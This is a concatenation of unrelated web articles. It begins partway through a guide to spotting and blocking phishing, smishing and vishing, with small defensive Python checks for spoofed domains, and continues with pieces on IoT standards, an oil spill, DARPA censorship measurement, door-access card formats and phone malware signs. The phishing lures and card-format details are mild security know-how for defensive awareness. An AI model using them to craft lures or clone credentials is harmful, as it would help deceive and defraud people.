Messages like this tell the attacker whether an email address is active and if the recipient is likely to accept this initial email as legitimate. Notice the email address ends in @mail.ru instead of @eku.edu like a real university email address would. The attacker has taken all of the elements of the real Laurence’s email and spoofed it for their own purposes. If the attacker gets a response, they can execute the second part of their plan, whether it be to get additional information or deliver a malicious link.
Spear Phishing Defenses
Email security software can block many of these emails, but some will still slip through. Double-check the email address these emails come from as well as the reply address. If you’re on your computer, hover your mouse over any links to see where they’ll take you before clicking on them. With some mobile phones, you can hold down your finger on a link to see where it goes, although this is riskier than checking it from a computer. Never open any attachments without making sure the message is legitimate.
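That reply-address check can even be automated. The sketch below is a hypothetical helper (the function name and logic are ours, not from any product mentioned here) that uses Python’s standard email module to flag messages whose Reply-To domain differs from the From domain:

```python
import email
from email.utils import parseaddr

def suspicious_reply_to(raw_message: bytes) -> bool:
    """Flag messages whose Reply-To domain differs from the From domain."""
    msg = email.message_from_bytes(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    # If there is no Reply-To header, replies go back to the From address.
    _, reply_addr = parseaddr(msg.get("Reply-To", from_addr))
    from_domain = from_addr.rsplit("@", 1)[-1].lower()
    reply_domain = reply_addr.rsplit("@", 1)[-1].lower()
    return from_domain != reply_domain  # a mismatch warrants a closer look
```

A mismatch is not proof of phishing (mailing-list software sets Reply-To legitimately), but it is a cheap signal worth surfacing to users.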
In addition to verifying the email address, check for grammatical errors that may indicate an attacker is looking for easy targets. While everyone makes mistakes in their emails occasionally, phishing attempts will have a higher number of errors than usual because they want to capture people that won’t question the attacker’s further actions.
If you can’t tell whether the message is real or not, contact the alleged sender through a different channel. Don’t reply to the email if it’s fraudulent or you’re unsure.
Also read: Zero-Click Attacks a Growing Threat
Whaling is similar to spear phishing, except that it targets high-level employees, like executives or directors. They typically have access to the most valuable information in a company, making them appealing targets for attackers. Bad actors can either sell the information they’re able to gather or hold it for ransom. Additionally, they may be able to manipulate these high-level employees into wiring large amounts of money into the attacker’s account.
Whaling Defenses

Whaling protections are similar to those of spear phishing. Email protection software can help, but you’ll still need to know what to look for in the few that slip through. Slight changes in the email address, a different reply-to address, or a large number of grammatical errors can all indicate phishing.
Clone phishing, like spear phishing, is typically targeted at a small group of people because the attacker duplicates an email that the recipients have already received. For example, if the organization sends out an invitation to a company-wide event, the attacker might follow that up with an email that includes a “registration link” which really includes malware. Because the initial email was genuine, employees are more likely to lower their guard when they get the second email.
Clone Phishing Defenses
Clone phishing emails will attempt to spoof the email address of the initial sender, but there will either be slight differences or a different reply-to address. Before clicking on links in an email that you’re not completely certain is legitimate, hold your mouse over them to see the web address and double-check the sender name and email address and compare it against what you have in your contact list. If you’re still not sure, you can always contact the person via a channel other than email, like Slack or phone, to ask them about it. Do not reply to the email if it’s fraudulent.
Smishing is the text message version of phishing attacks. They may be targeted, like spear phishing, but they may also be more general, appearing to come from their bank or Amazon, for example. The SMS text message will prompt users to call a fraudulent number and provide sensitive information or click on a link that will download malware onto their device.
Words like “urgent” prompt recipients into fast action, so they’re more likely to make a mistake. But note the link here. Actual requests from the USPS would likely include usps.com in the link, but this one is just a string of letters and numbers, marking it as fraudulent.
As people become more familiar with phishing and smishing attempts, attackers get better about disguising their links. Nowadays, instead of the random string of letters and numbers pictured above, you’re more likely to get smishing attempts that include links to ama.zon.com or vvalmart.com (note the double v in place of a w).
Smishing Defenses

The best way to guard against phishing attacks is to examine the message carefully before taking action. And if you’re not sure whether it’s legitimate, call the company using the number from their actual website or on the back of your credit or debit card in the case of bank-related smishing attempts. If you determine the text message is illegitimate, just delete it and block the number. Don’t reply to it, as you’ll confirm the number is active and will likely get more like it.
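The lookalike tricks described above can also be caught mechanically. The sketch below is purely illustrative (the substitution table and trusted-domain list are our own examples): it undoes common substitutions and dot-insertions before comparing a link’s domain against brands the recipient actually deals with:

```python
# Common lookalike substitutions: "vv" for "w", digits for letters, etc.
HOMOGLYPHS = {"vv": "w", "rn": "m", "0": "o", "1": "l", "3": "e", "5": "s"}
TRUSTED = {"walmart.com", "amazon.com", "usps.com"}  # example allow-list

def looks_spoofed(domain: str) -> bool:
    d = domain.lower()
    if d in TRUSTED or any(d.endswith("." + t) for t in TRUSTED):
        return False  # exact match or a legitimate subdomain
    for trick, real in HOMOGLYPHS.items():
        d = d.replace(trick, real)
    flat = d.replace(".", "")  # catches "ama.zon.com"-style dot insertion
    return any(t.split(".")[0] in flat for t in TRUSTED)
```

Here looks_spoofed("vvalmart.com") and looks_spoofed("ama.zon.com") both come back True, while the genuine domains pass. A production filter would use a proper homoglyph table and edit-distance checks rather than this toy list.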
Vishing is phishing that is executed via telephone, often coming from spoofed phone numbers. The attacker typically pretends to be someone from a legitimate business, like a bank or retailer, in an attempt to get personally identifiable information from the recipient.
Vishing Defenses

Many wireless phone providers have introduced spam protections to keep their customers from falling victim to vishing scams. While some will not even allow the phone to ring, lowering the chances that the recipient will actually answer the call, others will simply mark the call as potential spam, leaving the choice in the hands of the recipient.
You can also register your number on the federal Do Not Call list, but it doesn’t seem to have any actual effect on the number of scam calls received. Overall, unless you’re expecting a call from someone whose number you don’t have saved, it’s best to ignore calls from numbers you don’t know, trusting that callers with important information will leave a voicemail. If the caller does turn out to be spam, block the number, so they can’t use it to contact you again.
Common Examples of Phishing Attacks
Here are a few real-life examples of phishing attacks that you might run into.
Amazon Phishing Email
Millions of people use Amazon regularly, so it’s no surprise that attackers use their name and logo for phishing attempts. In the above example, the attacker uses the Amazon logo to legitimize the request.
However, notice how the sender uses a comma instead of a period at the end of the first sentence and includes an extra space between “in” and “your.” These grammatical errors serve to identify the easiest targets because if the email recipient doesn’t question those, they’re less likely to question any other mistakes the attacker makes. And if you were able to hover over either of the links, chances are you wouldn’t see an actual Amazon address. Other large vendors, like Walmart and Target, may have their email addresses spoofed as well.
Chase Phishing Text Message
Many attackers use phishing attempts that appear to be from the recipient’s bank because they’re more likely to respond quickly when money is involved. The above example tells the customer their account has been locked, so they’ll call the number to fix the problem. If that happens, they can then get the recipient to provide the information they want.
Some indicators that this is fake are the lack of spaces between “Chase” and “bank” and after the period. Additionally, there is a zero in the word “LOCKED” instead of a capital O. Chase users aren’t the only targets of this type of attack; most banks, and even PayPal, face similar spoofing.
Car Warranty Phishing Phone Call
Today, you’d be hard-pressed to find someone who hasn’t gotten a spam call from a recorded voice telling them their car warranty is expired or about to expire. This is a common phishing attack that attempts to manipulate people into giving over sensitive information like their credit card number, name, address, and social security number. Additionally, if the recipient answers the call, the attacker knows the number is active, and they can sell it to other attackers.
Similar examples of this scam are calls about student loan debt, saying that the IRS has put a warrant out for your arrest, or that there has been fraud on your credit card account. The tells are different for each of these, but typically, they won’t provide any specific information that would verify that the call is actually for you.
What Can Help to Protect You from Phishing?
Attention to detail will help you the most when protecting yourself and your business against phishing attempts, but there are other things you can do to lessen the number of attacks you’re subjected to.
Email Security Software
Email security software can block known malicious domains that other users have marked as spam in the past. Some also use AI and ML to identify patterns that suggest spam or phishing attempts. With these tools in place, you’re less likely to get general phishing emails, meaning you can pay more attention to spear phishing attempts. Some of the top email protection tools include:
- Mimecast Secure Email Gateway
- Barracuda Spam Firewall
- Proofpoint Enterprise Protection
- ClearSwift Secure Email Gateway
Get the full list of our recommendations for the Top Secure Email Gateway Solutions.
Cybersecurity Awareness Training
Employees have to know what to look for before they can spot a phishing attempt, so providing cybersecurity awareness training is the best way to protect your business from a data breach. But it can’t just be a one-time thing. New threats are always emerging, so you need to hold regular training sessions to keep your employees up to date and the training fresh in their minds. Some of the best cybersecurity awareness programs come from:
- SANS Institute
Get the full list of the Best Cybersecurity Awareness Training for Employees to find the program that’s right for your business.
If your training program doesn’t include phishing simulators, you should consider adding one. Phishing simulators give employees a safe space to test their knowledge of phishing attacks without risking personal or company information, sending test emails to see how well employees can spot the signs of phishing. They also give companies an idea of their risk profile by showing how many employees engaged in risky behavior with the fake phishing attempt.
Some companies that offer phishing simulators include:
- Infosec IQ
- Simple Phishing Toolkit
Phishing Protection Doubles as Malware and Ransomware Protection
Phishing attempts are big problems on their own, but they can also serve as a gateway for attackers to introduce malware and ransomware, costing businesses thousands of dollars in remediation. If businesses can effectively block phishing attempts, they also protect themselves against further attacks, especially because it means your employees know what to look out for. Investing time and money in phishing protection can help organizations save both in the long run.
Read next: QR Codes: A Growing Security Problem | <urn:uuid:a0b98c19-72e0-4866-9525-414af3ef6898> | CC-MAIN-2022-40 | https://www.esecurityplanet.com/threats/phishing-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00761.warc.gz | en | 0.942364 | 2,859 | 2.953125 | 3 |
Imagine that there were three different varieties of Wi-Fi style connectivity. Whenever you ordered a new Wi-Fi device you would have to select the right option – which might not always be available. Only some hotspots would be accessible to you – those with the same technology as in your laptop. Some places, like planes, might offer multiple technologies but because of lack of spectrum this reduced the data rate for each. Others chose not to deploy Wi-Fi until the confusion over the preferred technology was over. Such a world would be much more annoying and much less productive than the one we currently inhabit.
This is exactly the world of unlicensed IoT – the machine equivalent of Wi-Fi connectivity. Technologies include Sigfox, LoRa, Ingenu, Telensa, Weightless and others. Devices from one are incompatible with others and they mostly compete for the same spectrum, often interfering with each other. Why do we put up with it?
Some claim that these technologies target different market segments – for example Sigfox targets the lowest-cost devices that only transmit data, while LoRa is for more complex devices that need to receive as well. But Wi-Fi covers a wide breadth of use cases with a single standard, as does cellular.
We do not have one cellular technology for the high-bandwidth gamer and a different one for the low-usage pensioner. It is invariably less expensive to have a single standard, able to meet the needs of most users, which can deliver economies of scale and encourage widespread deployment of infrastructure.
Others claim that the market is large enough for multiple technologies – but it is much smaller by value than cellular. Or that competition is needed between different technologies at this early stage of its evolution – but most standards evolve as lessons are learnt rather than compete.
These are arguments designed to perpetuate the status quo, rather than ones with substance. A quick glance at the current wireless connectivity we use throughout our lives shows that there are no exceptions to the rule that (1) we have a single preferred connectivity solution in each different space – e.g. Bluetooth, Wi-Fi and cellular – and (2) only open standards succeed. There is no reason why IoT should be any different. And more fundamentally, there will not be widespread success of IoT connectivity until these conditions are met.
For our cell-phones we are used to wide-area connectivity being provided by mobile network operators (MNOs) using 3GPP cellular standards and local connectivity self-provided through Wi-Fi using IEEE standards under the auspices of the Wi-Fi Alliance. It seems likely that a very similar outcome will transpire for IoT.
Wide-area connectivity will come from MNOs deploying 3GPP standards, most likely NB-IoT. Local connectivity will come from an ETSI standard under the auspices of the Weightless SIG. Some devices will have dual-purpose chipsets, others will have perhaps only Weightless-certified connectivity – in the same way that some devices have dual cellular-Wi-Fi chipsets and others Wi-Fi only (but it is rare to have a cellular chipset that does not also have Wi-Fi connectivity).
While few would disagree with the prognosis of NB-IoT deployment, many might question the prediction of unlicensed deployment. After all, isn’t it the case that Sigfox and LoRa have significant deployments already? The answer is emphatically “no”. If we are to reach the predicted 50 billion devices in, say, a decade, then we need to deploy 13 million per day.
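That deployment rate is easy to sanity-check (assuming a flat ten-year rollout; the figures are from the paragraph above):

```python
# 50 billion devices over a decade, ignoring leap days.
devices = 50_000_000_000
days = 10 * 365
per_day = devices / days
print(f"{per_day / 1e6:.1f} million devices per day")  # prints "13.7 million devices per day"
```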
Sigfox have around 10 million users, less than a day’s worth of deployment. These are more akin to early trials than mass deployment. And this is exactly what would be predicted based on the observation that markets only succeed when there is a clear single open standard. (Sigfox are part of a process to develop a standard within ETSI so it is possible that they will find a route to become that open standard).
The situation of competing proprietary technologies can only be resolved through the wider industry getting together and collectively putting its weight behind a single unlicensed standard. The Weightless SIG is providing such a forum and welcomes membership from all those who wish to see this untenable situation resolved quickly in the interests of all who want to see IoT succeed. Or would you prefer the world of multiple incompatible Wi-Fi variants described above? | <urn:uuid:9cdb9823-9e74-4d93-829a-97a66dcf0959> | CC-MAIN-2022-40 | https://internetofbusiness.com/standards-iot-problem-sigfox/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00761.warc.gz | en | 0.955257 | 905 | 2.96875 | 3 |
Goleta, California — An oil slick stretched across 9 miles of coastal waters Thursday after a pipeline rupture spilled thousands of gallons of sticky, stinking crude just north of Santa Barbara. Crews are working around the clock to rake, skim and vacuum it up.
The coastline was the scene of a much larger spill in 1969 — the largest in U.S. waters at the time. Here are some things to know about the two spills:
VOLUME OF CRUDE
The 1969 blowout at a Union Oil Co. offshore platform dumped more than 3 million gallons of crude oil over a span of a month. Up to 30 miles of beaches were fouled.
Tuesday's pipeline break lasted about three hours. According to initial estimates, it spilled up to 105,000 gallons, with the majority of the oil remaining on land.
Up to 21,000 gallons reached the sea, early estimates show.
BIRDS, SEA LIFE
The 1969 spill killed 9,000 birds, 8.8 million barnacles, 30,000 mussels and 51,800 limpets, according to tallies by biology professor Michael Neushul of the University of California, Santa Barbara.
He and his students were unable to prove significant numbers of deaths among fish, whales, elephant seals, sea lions or plankton.
Tuesday's spill was mostly contained near one section of coastline at Refugio Beach. So far, there is no evidence of widespread harm to birds and sea life.
Other environmental impacts are still being assessed.
CALL TO ARMS
The 1969 disaster is credited with giving rise to the American environmental movement.
Groups like the Environmental Defense Center and Get Oil Out! formed in its aftermath.
That spill led to a prohibition on new offshore platforms in federal waters off California. But companies have used fracking and other techniques in an attempt to stimulate new production from old wells.
California has not issued a new lease for offshore oil drilling since 1968.
However, large offshore rigs still dot the horizon off the coast, pumping crude to shore. Small amounts of tar from natural seepage regularly show up on beaches.
Environmental groups used Tuesday's spill as a new opportunity to take a shot at fossil fuels and remind people of the area's notoriety with oil spills. | <urn:uuid:981ae144-db35-48fe-b52c-e2b9d443aa5c> | CC-MAIN-2022-40 | https://www.mbtmag.com/global/news/13214123/a-look-at-how-california-spill-compares-with-1969-disaster | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337529.69/warc/CC-MAIN-20221004215917-20221005005917-00761.warc.gz | en | 0.945191 | 472 | 3.296875 | 3 |
Tech developed under the program could help the Defense Department react to repressive actions in cyberspace.
The Defense Advanced Research Projects Agency is looking for innovative research concepts that can help foster an understanding of how authoritarian regimes control information.
For authoritarian regimes, maintaining control of information has always been imperative. But digital technologies are providing nations such as China—infamous for the surveillance of its own citizens—new tools for censorship.
DARPA, under a program called Measuring the Information Control Environment, or MICE, wants to develop artificial intelligence technology to “measure how digitally authoritarian regimes repress their populations at scale over the internet via censorship, blocking, or throttling,” according to a June 1 post on SAM.gov.
“MICE-developed technology will continuously and automatically update and feed into easily-understood dashboards in order to develop comprehensive, real-time ground truth understanding of how countries conduct domestic information control,” the post reads.
Right now, according to DARPA, censorship measurement techniques are insufficient because they aren’t comprehensive, persistent, and presentable. Under MICE, performers will build open-source prototypes in two phases with an eye toward addressing these deficiencies, according to a document outlining the program.
Such a capability would enable the Defense Department to bolster efforts to combat repression in cyberspace, according to the document. DARPA listed six topics proposals must address:
- What parts of the information environment they will target.
- Scope and granularity of measurement.
- Where and how they plan to collect information.
- How they will track changes to the information environment over time.
- Presentation for end users or analysts in easy-to-understand formats.
- How government agencies or non-government organizations interested in internet freedom can use the technology developed under MICE.
Proposals for MICE are due June 30, and awards will be made under the other transaction authority with a total combined award value for both project phases of up to $1 million. | <urn:uuid:0ea33684-5bc8-4e49-adab-5f5cc60e8cb1> | CC-MAIN-2022-40 | https://www.nextgov.com/emerging-tech/2021/06/darpa-calling-ai-proposals-measure-how-authoritarian-regimes-control-information/174442/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334987.39/warc/CC-MAIN-20220927033539-20220927063539-00161.warc.gz | en | 0.90627 | 416 | 2.546875 | 3 |
Education isn’t just pens and paper anymore; it’s becoming a field of interconnectivity and innovation. Now that the UN has declared Internet access a human right, the whole world can be brought into the classroom.
Education is still one of the biggest things that American taxpayers fund, and with the new 2012 budget over 4 billion dollars will be invested in bringing technology to the classroom. It’s no wonder many start-ups are looking toward the education market as prospectors looked toward San Francisco in 1849.
San Francisco has also always been a center of large venture capital investment and high-tech innovation. Now the coastal city in Northern California may also be the place where the future problems of education are solved, at places like the Kapor Center, which works on technological innovation for the classroom. The center houses many different entities, all of which work toward having a positive social impact and increasing access to educational opportunities. Kapor Capital, working out of the Kapor Center, helps to fund education-based start-ups.
Most of these start-ups (especially in the San Francisco area) are technology based, and all of them are looking for their small slice of the giant pie given to education in the US. Khan Academy is one such start-up, created out of a need that turned into a business. It helps children learn using videos posted on YouTube. Bill Gates has taken notice of the Khan Academy and invested 1.5 million dollars into the Academy.
Youtube has given people from the world over access to inspiring lectures and motivational speeches (also Justin Beibers career). The next form of access, which is changing the face of connection between people, is smartphones and tablets. With more people expected to access the internet via a mobile device its no wonder the next leap forward in education will come from Silicon Valley. | <urn:uuid:5baef7db-29a4-460b-8ae9-d4b1b14f1a0c> | CC-MAIN-2022-40 | https://www.faronics.com/news/blog/the-next-classroom-in-a-room-or-on-the-web | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335254.72/warc/CC-MAIN-20220928113848-20220928143848-00161.warc.gz | en | 0.962063 | 373 | 2.75 | 3 |
How Door Access Credentials Work
Door access control systems use various credentials to unlock the door. Credentials can include physical cards that we carry, a PIN that we enter, or even a physical aspect of a person (biometrics such as fingerprint or facial recognition). This article compares the credentials that we carry, which are sometimes called keycards, prox cards, or smartcards.
The card or keyfob responds to an RFID signal from the door access reader and then provides its stored identification code. Each credential presents a unique identification (ID) number that identifies it to the door reader. There are several types of credentials: older versions used Wiegand wire, magnetic stripe, or bar code technology, while today we use contactless (RFID) connections to the door readers. RFID credentials are sometimes referred to as prox cards, smartcards, or mobile credentials (Bluetooth to a smartphone). They come in various physical formats, such as thin cards, thick cards, and key fobs. Different credentials also use different data coding formats and operating frequencies between the credential and the door reader: there are 125 kHz credentials, 13.56 MHz credentials, and mobile Bluetooth credentials (smartphones).
Proximity-type credentials (or cards) are passive, so they don’t have a battery; they rely on the power broadcast from the reader to turn on. Proximity (or “prox”) credentials use the 125 kHz frequency, while smartcard (MiFare) technology uses 13.56 MHz. It is interesting to note that the industry defines the 125 kHz version as a “proximity card,” while the 13.56 MHz cards are classified as “smartcards,” yet both types are contactless credentials that are activated when they are close to (in proximity of) the reader.
All the credentials have an embedded ID number that is read by the access control reader. The door readers are designed to “read” only certain types of credentials. Some door readers can read more than one type of credential, but you must be careful to select the compatible reader and credential.
There are other types of credentials, such as biometric credentials and PINs. For a review of the security provided by various credentials, take a look at our article, “Comparison of Security Provided by Door Access Systems.”
HID Proximity Credentials
HID was established in 1991 as Hughes Identification Devices (HID) and has become a major supplier of credentials. Since the company holds a large market share, its credentials have become a de facto standard for the door access control industry. HID licenses its 13.56 MHz iCLASS, MiFare, and DESFire technology as well as its 125 kHz Indala and Prox card technology; this licensing increases the cost of these credentials.
Since HID credentials are very popular, they can be read by many different door readers; the reader’s specifications have to indicate “HID compatible.” These readers tend to cost more because their manufacturers must pay a license fee to HID. Other RFID credentials are also available.
HID offers different coding formats but mostly provides 26-bit coding. This coding includes room for a facility code and other information besides the specific ID number. When a 16-bit field is used for the ID, there are 65,535 usable ID combinations.
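To make the layout concrete, here is a sketch of decoding the widely documented 26-bit format (an H10301-style arrangement: one even parity bit, an 8-bit facility code, a 16-bit card ID, and one odd parity bit). The exact bit layout varies by vendor, and the credential values below are purely illustrative:

```python
# Sketch: decoding a 26-bit credential (H10301-style layout).
# Bit order (MSB first): [even parity][8-bit facility code][16-bit card ID][odd parity]
# Vendors use many other layouts; this example is illustrative only.

def decode_26bit(bits: str):
    """Decode a 26-character '0'/'1' string into (facility, card_id, parity_ok)."""
    assert len(bits) == 26
    facility = int(bits[1:9], 2)               # 8 bits  -> up to 256 facility codes
    card_id = int(bits[9:25], 2)               # 16 bits -> up to 65,535 card IDs
    even_ok = bits[:13].count("1") % 2 == 0    # even parity over the first 13 bits
    odd_ok = bits[13:].count("1") % 2 == 1     # odd parity over the last 13 bits
    return facility, card_id, even_ok and odd_ok

# Hypothetical credential: facility code 18, card ID 4545
print(decode_26bit("10001001000010001110000011"))   # (18, 4545, True)
```

The facility code is what lets two organizations use cards with the same 16-bit ID without collisions, which is why it is worth specifying one when ordering cards.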
When you order the cards, you can select what the card looks like, for example, the artwork and the material the card is made from (vinyl or PVC). You may want a thin card that fits in your wallet or one that is thick and has a slot for a lanyard. You can tell the manufacturer the starting ID number of the series, and whether or not you want the number on the label. You also have the opportunity to add a facility code.
Proprietary Proximity Credentials
Proprietary proximity credentials are very similar to the HID type; both use the 125 kHz frequency. The only difference is the protocol used between the credential and the reader. Since the transport coding is unique to each manufacturer, it is essential to pair the credential with a door reader from the same manufacturer. When you order these cards, you have options similar to those described above.
If you are installing new door readers, proprietary credentials and their associated readers will cost less. If you would like to be compatible with other buildings in your organization that use HID-type credentials, select HID-type readers and credentials.
Mifare or Smartcard Credentials
These credentials operate at 13.56 MHz and use a 128-bit code, which provides a dramatic increase in the number of unique card IDs available, as well as encryption. Smartcard technology also offers additional security and capability: besides ID information, the cards contain memory storage. The original MiFare cards were first used to keep track of transportation payments.

One important feature is data encryption between the credential and the door reader, which prevents the credentials from being hacked. Because the encryption requires compatibility between the credential and the door reader, you can’t use an encrypted smartcard with just any smartcard reader.

The MiFare card stores its data in bytes (8 bits each); the transmission includes encryption information and data blocks. When you order these cards, you can specify options similar to those described above, plus the amount of storage, although most door access control systems don’t make use of the storage.
Mobile Smartphone Credentials
Access control systems that use mobile credentials rely on your smartphone instead of a card or other credential. A mobile credential is an authorization token much like a prox card or keyfob, but the ID number is held on your smartphone instead of a card, which is why we call it a mobile credential. Just like other types of credentials, it contains a unique number that can be used as the electronic key to open a door with an electric lock.
The smartphone can connect to a door reader using Bluetooth, NFC, or even WiFi. Bluetooth (BLE) is the most common type of communication used in the security market.
If you want to use your smartphone as the credential, you must select a reader that operates with the Bluetooth connected smartphone. Some of these mobile-enabled readers will support both proximity and mobile credentials. Door readers from Isonas and Hartmann Controls include the mobile credential capability.
How RFID Door Access Readers Work
The RFID door readers use credentials that have embedded circuits and an antenna. The reader broadcasts a signal that is received by the credential antenna. The transmitted electrical signal from the door reader contains enough power to energize the circuit in the credential. Once the electric circuit in the credential receives the power, it sends back a signal to the access control reader that includes its identification (ID) number. For more details about this, read the article, How Door Access Control Works.
A biometric credential is authentication using a measurable characteristic of a person, such as a fingerprint, vein pattern, or facial recognition. The credential is the registered code associated with that biometric, and it is given a unique ID number in the access control system. Special biometric readers are required to detect the person’s characteristics.
Summary of Door Access Credentials
There are several types of credentials that can be used to gain entry through an access control door reader: thin cards, thick cards for lanyards, keyfobs, or even your mobile phone. HID and other proprietary protocols are used to transfer the information from the credential to the reader. It is always important to make sure that the door reader and the credential are compatible.
If you would like help selecting your access control system, please contact us at 1-800-431-1658 in the USA, or at 914-944-3425 everywhere else, or use our contact form. | <urn:uuid:d157084a-25d2-4f7c-a9c9-d7c78127d255> | CC-MAIN-2022-40 | https://kintronics.com/comparison-door-access-credentials/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337537.25/warc/CC-MAIN-20221005042446-20221005072446-00161.warc.gz | en | 0.92247 | 1,639 | 2.734375 | 3 |
When people think of viruses and malware, the first things that come to mind are cyberattacks that cost enterprises millions of dollars in damages. But with more people switching from desktops to mobile devices, hackers have also started infiltrating cellphones to get sensitive information from people.
So is it possible to get malware on mobile devices? Phones don’t have the same security systems as computers, which makes them more vulnerable to several types of malware. Mobile devices usually get malware from malicious apps, operating system vulnerabilities, suspicious emails, non-secure Wi-Fi and URLs, and text or email phishing.
Why Are Phones Vulnerable to Malware?
People use smartphones for just about everything – even for work. Most people find phones more convenient, less expensive, and more mobile when it comes to storing and accessing data that are important for work. But while it has its fair share of advantages, phones in the office might also be threatening the business without the user realizing it.
The main reason phones are vulnerable to different kinds of malware is that most phones don’t have the security systems that workstations and servers utilize: they lack the built-in firewalls, antivirus software, and encryption systems that computers have. A company’s IT team should have policies in place for accessing important information through mobile devices to prevent cyber theft through malware.

Another important thing to remember is that some phones are more likely to get malware than others — Android devices account for 47.15% of all infected gadgets, while iOS devices account for only around 1%. Make sure to consider this before allowing mobile devices to access sensitive business information.
5 Ways a Phone Gets Malware
Finding out how a phone gets malware makes it easier for employees to avoid infecting their devices. Here are some of the most common ways that a phone gets malware and other malicious content:
- Malicious Apps
Apps and downloads are the most common methods that hackers use to gain access to mobile devices. Most apps from the official app store are safe, but some of them might contain malware if they come from non-legitimate sources. These malicious apps appear safe, but they’re typically filled with spyware or other kinds of malware.
Some developers also make the mistake of using pirated development tools. This can compromise the app, because the end product may contain malicious code used for damaging the device or stealing sensitive data. Always check the app store you’re downloading from to avoid getting malware.
- Operating System Vulnerabilities
Sometimes, the mobile device itself has different vulnerabilities that hackers might exploit to gain access. Most of these vulnerabilities are easy to discover and patch up for users who regularly update their software. Keeping the device up to date keeps hackers from taking advantage of the vulnerabilities in the phone’s operating system.
- Suspicious Emails
One of the reasons why employees use mobile devices for work is that phones make it easy for them to answer work-related calls and emails. But without the right cybersecurity education for the employees, they’re likely to fall victim to the malware in suspicious emails.
One classic example of a harmful email that catches unsuspecting employees is one claiming they’ve won something; it takes them to a non-secure link or a dummy site. Clicking the link allows the malware to enter the phone, exposing all the data stored there to the hackers.
- Non-Secure URLs and Wi-Fi
Using non-secure websites exposes users to the risk of transmitting malware to the device. It makes the device more susceptible to “man-in-the-middle” attacks. When accessing these kinds of websites, make sure that the VPN is active first or that the phone’s antivirus protection is working well.
Sometimes, the phone’s browser itself is a source of vulnerabilities, which leads to web browser attacks. These are quite common in Android phones, so make sure to always update the operating system as needed.
- Text Message and Voicemail Phishing
Aside from suspicious emails, employees may also get voicemails or text messages from a seemingly trusted source. They usually ask for information about the victim or the device they’re using, which the hackers use to steal other important data like credit card information and social security numbers.
If you encounter something similar, the first thing to do is contact the company directly through its official phone number and verify the message with them. Legitimate companies don’t ask for sensitive information through text, so never reply to suspicious texts until the company concerned has been contacted directly.
8 Signs of Malware on Phones
Most kinds of viruses and malware are made to steal and manipulate data, but they also affect the phone’s performance. If the device shows any of these signs, there’s a huge chance that it’s infected with the malware:
- Excessive Data Usage – Phone viruses usually run as a background app, which is why they’re often undetected. One good way to spot them is to check the phone’s data usage. A sudden and unexplainable increase in overall data usage means there’s malware in the device.
- Fraudulent Charges – Some kinds of malicious mobile content drive up credit card bills with text charges and in-app purchases. Hackers use the stolen banking information to sign users up for “premium” accounts and collect the money.
- Crashing Apps – Compromised phones experience crashing apps more often than other mobile devices. There are several reasons why apps may crash, such as too many running apps or full storage. If the apps are still crashing even after cleaning the storage or closing most of them, then it’s time to check the device for viruses or malware.
- Pop-Ups – Ads popping up on the screen is a normal advertising strategy when browsing through the web. However, if the device still has pop-ups even after closing the browser, then it might be caused by the presence of adware. Adware is a specific type of phone virus that’s used for data mining.
- Quick Battery Drain – Aside from the excessive data usage, the malware also drains the phone’s battery quickly because of the sudden increased use of RAM. Some phones may also have battery problems so make sure to rule that out first before checking the device for malware and viruses.
- Unrecognizable Apps – Apps that seemingly appear out of nowhere are usually caused by malware. Trojan horses often disguise themselves as legitimate-looking apps that cause severe damage to the phone. They may also attach themselves to other legitimate applications.
- Overheating – Since malware also consumes CPU and RAM usage, it causes the phone to overheat. Although the occasional overheating is normal for most phones, chronic overheating issues might be a sign of a more serious cyberthreat.
- Spam Text – This is a common type of malware found in most mobile devices. Spam texts gather sensitive data from the phone. They might also infect other contacts by sending malicious attachments and links without the owner’s knowledge.
Tips to Protect the Mobile Device from Malware
While mobile devices are prone to malware attacks, there are still a few ways to avoid them. Here are some helpful tips to protect your smartphone from cyberattacks:
- Don’t jailbreak the device. When a person jailbreaks their phone, they remove all the built-in security systems of the device. This allows them to do more with their phone, but it also makes the device vulnerable to different kinds of malware and viruses on the internet.
- Connect to secure Wi-Fi networks. Aside from a secure Wi-Fi network, using a VPN also prevents hackers from entering the network and interrupting the data flow. A VPN (Virtual Private Network) allows secure information sharing across different devices even when using public Wi-Fi networks.
- Install trusted antivirus software. Like in desktops, good antivirus software is the phone’s best line of defense against different types of malware, viruses, and other malicious content. Make sure to run the software and remove threats regularly.
- Keep the operating system updated. Sometimes, the phone’s operating system itself has vulnerabilities that hackers use to gain access to different kinds of sensitive information. Updating the phone’s OS regularly gets rid of these vulnerabilities because new updates have patches that eliminate the bugs from the previous versions.
- Never open suspicious messages. Strange texts, links, and email attachments often lead to phishing sites. Never reply to suspicious messages with personal information unless you’ve already confirmed that their source is trustworthy.
- Download apps from trusted app stores and sources. Apps are also another gateway to malware or phishing sites, so make sure to only download them from official app stores.
- Educate employees about mobile device policies. Since employees use their phones when accessing sensitive company information, they should be aware of the different kinds of malware, how dangerous they are, and how to avoid them. It’s also important to have security regulations about the use of smartphones for work.
Keep All Your Device Secure with Abacus
When it comes to strengthening a company’s cybersecurity systems, it’s important to treat mobile devices the same as servers and computers. Hackers exploit any kind of opening they can use to steal sensitive information from the company, so it’s essential to have a comprehensive security system that works on all devices.
Here at Abacus, we understand how important it is for companies to maintain confidentiality and security. Our team of IT experts is here to eliminate vulnerabilities, maximize protection, and provide the best cyber solutions for the company. Call us now to experience the Abacus Advantage. | <urn:uuid:3df79339-1fff-42b2-bbf1-09ac5933f1f4> | CC-MAIN-2022-40 | https://goabacus.com/can-you-get-malware-on-your-phone/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334620.49/warc/CC-MAIN-20220925225000-20220926015000-00362.warc.gz | en | 0.917074 | 2,021 | 2.75 | 3 |
Database security is a broad section of information security that concerns itself with protecting databases against compromises of their integrity, confidentiality and availability. It covers various security controls for the information itself stored and processed in database systems, underlying computing and network infrastructures, as well as applications accessing the data.
1 Management Summary
